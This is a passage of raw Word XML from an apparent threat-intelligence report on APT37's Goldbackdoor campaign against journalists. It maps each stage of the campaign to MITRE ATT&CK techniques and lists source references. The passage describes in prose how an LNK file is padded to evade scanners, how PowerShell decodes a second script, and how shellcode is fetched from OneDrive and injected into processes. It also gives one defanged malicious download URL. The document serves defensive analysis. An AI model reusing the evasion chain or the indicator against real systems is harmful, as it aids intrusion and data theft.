                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D1CFFE7" w14:textId="77777777" w:rsidR="00EC2E4B" w:rsidRPr="00F808AD" w:rsidRDefault="00EC2E4B" w:rsidP="00EC2E4B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C9220D3" w14:textId="77777777" w:rsidR="00EC2E4B" w:rsidRPr="006A35A5" w:rsidRDefault="00EC2E4B" w:rsidP="00EC2E4B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="02BAF4D2" w14:textId="77777777" w:rsidR="005F312C" w:rsidRPr="0077286F" w:rsidRDefault="005F312C" w:rsidP="005F312C"/>
    <w:p w14:paraId="594ECC04" w14:textId="7A9DEA81" w:rsidR="005F312C" w:rsidRDefault="005F312C" w:rsidP="005F312C">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:hyperlink r:id="rId97" w:history="1">
        <w:r w:rsidR="00BB78BC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Operation Daybreak | </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00BB78BC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Securelist</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00227A6C">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>[201</w:t>
      </w:r>
      <w:r w:rsidR="00BB78BC">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00227A6C">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173A42C3" w14:textId="7C5D96D3" w:rsidR="00D507F9" w:rsidRDefault="00D507F9" w:rsidP="005F312C">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:hyperlink r:id="rId98" w:history="1">
        <w:r w:rsidR="005D3A54" w:rsidRPr="00B05F2A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>[2018]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F477BE2" w14:textId="1B375D03" w:rsidR="00D507F9" w:rsidRDefault="00D507F9" w:rsidP="005F312C">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:hyperlink r:id="rId99" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">North Korean APT </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>InkySquid</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> Infects Victims Using Browser Exploits | </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Volexity</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2021]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F7F9D5" w14:textId="28B1196E" w:rsidR="00946003" w:rsidRDefault="00946003" w:rsidP="005F312C">
      <w:r>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
      <w:hyperlink r:id="rId100" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">North Korean hackers launch </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>RokRat</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> Trojan in campaigns against the South | ZDNET</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2021] (via Google Search on APT37 Operation Daybreak)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D295CF1" w14:textId="243E56EC" w:rsidR="00924159" w:rsidRDefault="00924159" w:rsidP="005F312C">
      <w:r>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:hyperlink r:id="rId101" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Nation-state Hackers Target Journalists with </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Goldbackdoor</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> Malware | </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Threatpost</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2022] (via Google Search on APT37 Attack Drive </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>By )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0699567B" w14:textId="448651D1" w:rsidR="00194A2C" w:rsidRDefault="00194A2C" w:rsidP="005F312C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">[6] </w:t>
      </w:r>
      <w:hyperlink r:id="rId102" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>North Korean hackers targeting journalists with novel malware (bleepingcomputer.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002812D8">
        <w:t xml:space="preserve"> (via Google Search on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002812D8" w:rsidRPr="002812D8">
        <w:t>Goldbackdoor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002812D8" w:rsidRPr="002812D8">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002812D8" w:rsidRPr="002812D8">
        <w:t>Attacks</w:t>
      </w:r>
      <w:r w:rsidR="002812D8">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="14545D67" w14:textId="266D3D00" w:rsidR="002812D8" w:rsidRDefault="002812D8" w:rsidP="002812D8">
      <w:r>
        <w:t xml:space="preserve">[7] </w:t>
      </w:r>
      <w:hyperlink r:id="rId103" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>GoldBackdoor</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> malware used by an APT group to target Journalists (izoologic.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">  (via Google Search on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002812D8">
        <w:t>Goldbackdoor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002812D8">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002812D8">
        <w:t>Attacks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="47C9FF9E" w14:textId="3A1B1AF2" w:rsidR="00561BB2" w:rsidRDefault="00561BB2" w:rsidP="002812D8">
      <w:r>
        <w:t xml:space="preserve">[8] </w:t>
      </w:r>
      <w:hyperlink r:id="rId104" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Gold backdoor Removal - Remove Gold backdoor Easily! (securitystronghold.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (via Google Search on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Goldbackdoor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> details)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6342D981" w14:textId="03900719" w:rsidR="002812D8" w:rsidRDefault="002812D8" w:rsidP="005F312C">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="367064FD" w14:textId="5A9756D3" w:rsidR="00F14862" w:rsidRDefault="002D18C6" w:rsidP="005F312C">
      <w:r>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:r w:rsidR="00811AE1" w:rsidRPr="00811AE1">
        <w:t xml:space="preserve">Sophisticated hackers believed to be tied to the North Korean government are actively targeting journalists with novel malware dubbed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00811AE1" w:rsidRPr="00811AE1">
        <w:t>Goldbackdoor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00811AE1" w:rsidRPr="00811AE1">
        <w:t>. Attacks have consisted of multistage infection campaign with the ultimate goal of stealing sensitive information from targets</w:t>
      </w:r>
      <w:r w:rsidRPr="002D18C6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176B1652" w14:textId="77777777" w:rsidR="002F7B21" w:rsidRDefault="00F14862" w:rsidP="005F312C">
      <w:r>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:r w:rsidRPr="00F14862">
        <w:t>Researchers at Stairwell followed up on an initial report from South Korea’s NK News, which revealed that a North Korean APT known as APT37 had stolen info from the private computer of a former South Korean intelligence official.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44512082" w14:textId="49B160BF" w:rsidR="00896460" w:rsidRDefault="002F7B21" w:rsidP="005F312C">
      <w:r>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:r w:rsidRPr="002F7B21">
        <w:t xml:space="preserve">The current campaign saga unfolded beginning March 18, when NK News shared “multiple malicious artifacts with the Stairwell threat research team from a spear-phishing campaign </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0064704D">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="0064704D" w:rsidRPr="0064704D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1566.002</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0064704D" w:rsidRPr="0064704D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0064704D" w:rsidRPr="0064704D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0064704D" w:rsidRPr="0064704D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Link</w:t>
      </w:r>
      <w:r w:rsidR="0064704D" w:rsidRPr="0064704D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0064704D">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="002F7B21">
        <w:t>targeting journalists who specialize in the DPRK,” researchers wrote. The messages were sent from the personal email of a former director of South Korea’s National Intelligence Service, NIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4AE81C" w14:textId="77777777" w:rsidR="00F32000" w:rsidRDefault="00896460" w:rsidP="005F312C">
      <w:r>
        <w:t xml:space="preserve">[7] </w:t>
      </w:r>
      <w:r w:rsidRPr="00896460">
        <w:t>Furthermore, the phishing emails sent by the threat actors impersonate a former director of South Korea’s National Intelligence Service, whose account was previously infected by the earlier mentioned North Korean-backed threat group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231FECF0" w14:textId="6FC02B7E" w:rsidR="00F32000" w:rsidRDefault="00F32000" w:rsidP="005F312C">
      <w:r>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:r w:rsidRPr="00F32000">
        <w:t xml:space="preserve">In stage one, a victim must download a ZIP file from a compromised site, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0064704D">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="0064704D" w:rsidRPr="0064704D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1566.002</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0064704D" w:rsidRPr="0064704D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0064704D" w:rsidRPr="0064704D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0064704D" w:rsidRPr="0064704D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Link</w:t>
      </w:r>
      <w:r w:rsidR="0064704D" w:rsidRPr="0064704D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0064704D">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="0064704D" w:rsidRPr="0064704D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1189 : Drive By Compromise</w:t>
      </w:r>
      <w:r w:rsidR="0064704D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="0064704D" w:rsidRPr="0064704D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1204.001 : User Execution : Malicious Link</w:t>
      </w:r>
      <w:r w:rsidR="0064704D">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00F32000">
        <w:t>https[:]//main[.]</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F32000">
        <w:t>dailynk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F32000">
        <w:t>[.]us/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F32000">
        <w:t>regex?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F32000">
        <w:t>=oTks2&amp;file=Kang Min-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F32000">
        <w:t>chol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F32000">
        <w:t xml:space="preserve"> Edits2.zip, which executes a compressed Windows shortcut.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB073AD" w14:textId="77777777" w:rsidR="00C518A9" w:rsidRDefault="00F32000" w:rsidP="005F312C">
      <w:r>
        <w:t xml:space="preserve">[7] </w:t>
      </w:r>
      <w:r w:rsidRPr="00F32000">
        <w:t>The emails sent to the journalists contained a link to download ZIP archives that had LNK files, both named 'Kang Min-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F32000">
        <w:t>chol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F32000">
        <w:t xml:space="preserve"> edits'. Kang Min-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F32000">
        <w:t>chol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F32000">
        <w:t xml:space="preserve"> is North Korea’s Minister of Mining Industries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229EF1D7" w14:textId="16009C3E" w:rsidR="0078645B" w:rsidRDefault="00C518A9" w:rsidP="005F312C">
      <w:r>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:r w:rsidRPr="00C518A9">
        <w:t xml:space="preserve">The LNK file (Windows shortcut) is masqueraded </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0064704D">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="0064704D" w:rsidRPr="005027B7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0064704D" w:rsidRPr="005027B7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1036 Masquerading</w:t>
      </w:r>
      <w:r w:rsidR="0064704D" w:rsidRPr="00C518A9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0064704D">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00C518A9">
        <w:t>with a document icon and uses padding to artificially increase its size to 282.7 MB, hindering easy uploads to Virus Total and other online detection tools</w:t>
      </w:r>
      <w:r w:rsidR="0064704D">
        <w:t xml:space="preserve"> ( </w:t>
      </w:r>
      <w:r w:rsidR="0064704D" w:rsidRPr="0064704D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1027 : Obfuscated Files or Information</w:t>
      </w:r>
      <w:r w:rsidR="0064704D">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
      <w:r w:rsidRPr="00C518A9">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10161733" w14:textId="0A70A980" w:rsidR="0078645B" w:rsidRDefault="0078645B" w:rsidP="0078645B">
      <w:r>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:r w:rsidRPr="0078645B">
        <w:t>Upon execution</w:t>
      </w:r>
      <w:r w:rsidR="0064704D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0064704D">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="0064704D" w:rsidRPr="00AD544F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1204.002</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0064704D" w:rsidRPr="00AD544F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> : User Execution : Malicious File</w:t>
      </w:r>
      <w:r w:rsidR="0064704D">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
      <w:r w:rsidRPr="0078645B">
        <w:t xml:space="preserve">, a PowerShell script launches </w:t>
      </w:r>
      <w:r w:rsidR="00AD544F">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00AD544F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1059.001</w:t>
      </w:r>
      <w:r w:rsidR="00AD544F" w:rsidRPr="00B7244F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidR="00AD544F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command and Scripting Interpreter</w:t>
      </w:r>
      <w:r w:rsidR="00AD544F" w:rsidRPr="00B7244F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AD544F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AD544F" w:rsidRPr="0078645B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AD544F">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
      <w:r w:rsidRPr="0078645B">
        <w:t>and opens a decoy document (doc) for distraction while decoding a second script in the background</w:t>
      </w:r>
      <w:r w:rsidR="00AD544F">
        <w:t xml:space="preserve"> ( </w:t>
      </w:r>
      <w:r w:rsidR="00AD544F" w:rsidRPr="009E4622">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">T1140 : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AD544F" w:rsidRPr="009E4622">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Deobfuscate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AD544F" w:rsidRPr="009E4622">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/Decode Files or Information</w:t>
      </w:r>
      <w:r w:rsidR="00AD544F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
      <w:r w:rsidRPr="0078645B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1EFB3E" w14:textId="1BB098A2" w:rsidR="00485C4E" w:rsidRDefault="00485C4E" w:rsidP="0078645B">
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00C97663">
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidRPr="00485C4E">
        <w:t xml:space="preserve">The second script downloads </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C37C69">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00C37C69" w:rsidRPr="00C37C69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C37C69" w:rsidRPr="00C37C69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1105 : Ingress Tool Transfer</w:t>
      </w:r>
      <w:r w:rsidR="00C37C69" w:rsidRPr="00C37C69">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C37C69">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00485C4E">
        <w:t xml:space="preserve">and executes a shellcode payload </w:t>
      </w:r>
      <w:r w:rsidR="00C37C69">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00C37C69" w:rsidRPr="00C37C69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1059.003 : &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
      </w:r>
      <w:r w:rsidR="00C37C69" w:rsidRPr="00C37C69">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C37C69">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00485C4E">
        <w:t>stored on Microsoft OneDrive, a legitimate cloud-based file hosting service that is unlikely to generate AV alerts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DC346C" w14:textId="23C0A32F" w:rsidR="00C97663" w:rsidRDefault="00C97663" w:rsidP="0078645B">
      <w:r>
        <w:t xml:space="preserve">[6] </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97663">
        <w:t xml:space="preserve">This payload is called “Fantasy,” and according to Stairwell, it’s the first of the two deploying mechanisms of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C97663">
        <w:t>Goldbackdoor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C97663">
        <w:t>, both relying on stealthy process injection</w:t>
      </w:r>
      <w:r w:rsidR="00EA008E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00EA008E">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00EA008E" w:rsidRPr="00EA008E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00EA008E" w:rsidRPr="00EA008E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1055 : Process Injection</w:t>
      </w:r>
      <w:r w:rsidR="00EA008E">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97663">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2B64B6" w14:textId="314D7424" w:rsidR="00C97663" w:rsidRDefault="00C97663" w:rsidP="0078645B">
      <w:r>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97663">
        <w:t xml:space="preserve">“Both parts are written in position-independent code (shellcode) containing an embedded payload, and use process injection to deploy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C97663">
        <w:t>Goldbackdoor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C97663">
        <w:t>,”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036D64B8" w14:textId="253855A6" w:rsidR="005317DB" w:rsidRDefault="005317DB" w:rsidP="0078645B">
      <w:r>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:r w:rsidRPr="005317DB">
        <w:t xml:space="preserve">Fantasy parses and decodes </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00EA008E">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00EA008E" w:rsidRPr="009E4622">
        <w:rPr>
